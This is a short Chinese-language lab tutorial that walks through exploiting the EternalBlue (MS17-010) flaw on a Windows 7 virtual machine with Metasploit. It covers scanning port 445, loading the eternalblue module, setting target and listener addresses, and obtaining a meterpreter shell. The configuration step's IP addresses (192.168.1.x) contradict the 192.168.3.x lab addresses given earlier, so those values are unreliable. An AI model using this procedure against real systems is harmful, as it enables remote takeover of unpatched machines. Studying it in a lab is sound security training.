环境准备
本次漏洞复现使用虚拟机环境进行:
攻击机:kali IP地址:192.168.3.128
靶机:windows7 64位 IP地址:192.168.3.141
kali开启msfconsole
使用msfconsole命令,当出现msf6 > 说明成功进入msf命令行。
注:若是第一次开启msf,需要输入命令msfdb init 进行msf数据库初始化。
使用msf自带db_nmap进行端口扫描
使用命令:db_nmap -sT 192.168.3.141
扫描目标主机是否开启445端口,是否具有永恒之蓝漏洞。
注:扫描之前需要先关闭win7的防火墙。
使用search命令搜索MS17_010
在msf命令行中使用search命令搜索MS17_010漏洞
使用use命令使用ms17_010_eternalblue模块
使用show options命令查看模块相关配置
yes表示需要进行配置。
配置rhosts选项为192.168.1.141(靶机地址)
配置lhost选项为192.168.1.136(攻击机地址)
配置lport选项为4444(使用任意未被使用的端口)
使用run命令运行模块
当命令行出现meterpreter时,就说明成功控制了win7